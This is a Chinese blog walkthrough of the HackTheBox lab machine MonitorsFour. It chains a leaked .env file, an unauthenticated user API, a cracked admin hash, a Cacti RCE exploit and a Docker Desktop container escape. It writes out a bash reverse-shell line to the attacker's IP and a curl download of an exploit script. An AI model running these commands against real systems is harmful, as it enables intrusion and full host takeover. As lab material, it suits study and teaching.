当前位置: 首页 > news >正文

HTB MonitorsFour 靶机实战记录:从越权访问到容器逃逸的完整攻击链

news 2026/6/28 14:07:05

靶机概览

HTB MonitorsFour 是一台难度评级为 EASY 的 Windows 靶机。该靶机以企业监控环境为背景,主要攻击路径围绕 信息泄漏、服务枚举、已知漏洞利用(CVE)与容器逃逸 展开。从外部 Web 应用入手,通过配置文件泄露获取凭据,利用 Cacti 系统的高危 RCE 漏洞进入容器内部,最终借助 Docker Desktop 的容器逃逸漏洞突破边界,成功控制底层 Windows 宿主系统。整个过程清晰地展示了从外网渗透到容器逃逸的完整链条,为理解 Windows 环境下容器化服务的常见安全风险与攻击面提供了典型的实战案例。

信息收集

端口扫描

使用 Rustscan 和 Nmap 进行初步扫描:

rustscan -a 10.10.11.98 --ulimit 5000
nmap -sV -sC -p 80,5985 10.10.11.98 -Pn -v

发现服务:

  • 80/tcp - HTTP (nginx) - 重定向到 monitorsfour.htb
  • 5985/tcp - HTTP (Microsoft HTTPAPI) - WinRM 服务

子域名枚举

使用 FFuF 进行子域名枚举:

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt \ -H "Host: FUZZ.monitorsfour.htb" \ -u http://monitorsfour.htb \ -fs 138

发现子域名:

  • cacti.monitorsfour.htb - Cacti 监控系统

目录枚举

使用 dirsearch 发现敏感文件:

dirsearch -u http://monitorsfour.htb -e php,html,js,json,txt

关键发现:

  • /.env - 包含数据库凭据
  • /user - API 端点
  • /login - 登录页面

初始访问

数据库信息泄漏

访问http://monitorsfour.htb/.env泄露数据库配置:

DB_HOST=mariadb DB_PORT=3306 DB_NAME=monitorsfour_db DB_USER=monitorsdbuser DB_PASS=f37p2j8f4t0r

未授权信息泄露

访问http://monitorsfour.htb/api/v1/users?token=0&id=x返回用户数据,包含:

[ { "id": 2, "username": "admin", "email": "admin@monitorsfour.htb", "password": "56b32eb43e6f15395f6c46c1c9e1cd36", "role": "super user", "token": "d8a25ad7bdb87198d0", "name": "Marcus Higgins", "position": "System Administrator" } // ... 其他用户 ]

密码破解

使用 CrackStation 破解 MD5 哈希:

  • 56b32eb43e6f15395f6c46c1c9e1cd36wonderful1

访问管理面板

使用凭据admin:wonderful1成功登录

查看更新日志

访问http://monitorsfour.htb/admin/changelog

关键更新:

  • V.1.9 (June 2, 2025) - API 用户集成,支持令牌认证
  • V.1.7 (May 16, 2025) - 迁移到 Windows 和 Docker Desktop 4.44.2
  • V.1.6 (May 1, 2025) - 修复忘记密码功能的 SQL 注入漏洞

CVE-2025-24367 - Cacti RCE 漏洞

搜索发现 Cacti 1.2.28 存在 RCE 漏洞CVE-2025-24367对于漏洞利用需要已认证的Cacti用户

枚举 Cacti 用户

使用 Burp Suite 对http://cacti.monitorsfour.htb/进行爆破:

成功获取凭据:marcus:wonderful1

获取反向 Shell

使用公开的 PoC:

python3 exploit.py -u marcus -p wonderful1 -i 10.10.16.11 -l 4033 -url http://cacti.monitorsfour.htb

环境探测

检查挂载点

mount

发现是容器环境,路径中包含 desktop-containerd,这明确指向 Docker Desktop 环境,changelog说明了其版本为4.44.2。

Docker Desktop 逃逸漏洞 - CVE-2025-9074

搜索发现 Docker Desktop 4.44.2 存在容器逃逸漏洞CVE-2025-9074

访问 Docker API

curl -s http://192.168.65.7:2375/version

成功访问 Docker API,确认存在未受保护的 Docker 守护进程。

Docker 逃逸

准备 POC

攻击机开启 HTTP 服务器

python3 -m http.server 8033

容器内下载

curl http://10.10.16.11:8033/cve-2025-9074.sh -o cve-2025-9074.sh
执行容器逃逸
./cve-2025-9074.sh 192.168.65.7 "bash -c 'bash -i >& /dev/tcp/10.10.16.11/1033 0>&1'" 2375

成功获得 root shell

Flag 获取

获取 user flag

cat /host_root/run/desktop/mnt/host/c/Users/marcus/Desktop/user.txt

获取 root flag

cat /host_root/run/desktop/mnt/host/c/Users/Administrator/Desktop/root.txt

http://www.cnnetsun.cn/news/22187.html

相关文章:

  • 60、深入理解与配置 SSH:安全远程访问的全面指南
  • 视频生成大模型Wan2.2开源:MoE架构重构创作生态,消费级显卡实现电影级视频生成
  • [HNCTF 2022 Week1]easync
  • Ultravox终极指南:10个步骤掌握AI音频生成技术
  • 虎贲等考 AI 科研工具:大学生 / 科研人必备!用 AI 高效搞定学术研究
  • 学习 Python,用哪个编辑器比较好?
  • 如何高效地分析问卷调查的数据?
  • nginx部署前端vue项目(非常详细)零基础入门到精通,收藏这篇就够了
  • 何为前端工程化?一文给你说透前端工程化,收藏这篇就够了
  • 免费学习资源|谷歌 5天AI Agents 强化课程|十一月开课
  • 前端及其技术栈,零基础入门到精通,收藏这篇就够了
  • vscode 前端常用插件推荐,零基础入门到精通,收藏这篇就够了
  • 前端牛马 被优化,二选一
  • 社交媒体用户行为特征与发布时间的关联性
  • 微服务编排引擎Conductor:源码编译与定制化开发实战手册
  • WINCC实现手机 APP 远程监控及短信报警方案
  • 《Python学习手册》第1章 Python概述
  • 西南民族大学软件工程25级研究生赴华清远见成都中心开启元宇宙实训之旅
  • Obsidian图像工具包:终极图片管理与编辑指南
  • 自主高性价比、高精度车规级姿态感知、倾角感知模组-应用消费级无人机、自动驾驶、机器人、智能制造、基础设施、智能穿戴等
  • ComfyUI智能修复技术:图像处理的革命性突破
  • 碳硅协同:人工智能作为碳基生命合作伙伴的终极形态分析
  • 小公司效率低、管理乱?一张《四维照妖镜》,照出你的“效率黑洞”
  • 拒绝无意义刷屏,打造高效率热点追踪,极空间部署『TrendRadar』
  • 3步精通JSON对比工具:从新手到高手的实战指南
  • lombok的几个核心注解是什么?
  • Qwen3-VL-30B-A3B-Thinking-FP8多模态大模型实战指南:从技术突破到产业落地
  • 庄散资金主买卖差、散买卖差
  • AI办公工具选型指南:从文档到PPT,这些工具如何提升效率?
  • Web 漏洞扫描入门没头绪?2025 十大工具(详细拆解),零基础也能从入门到精通!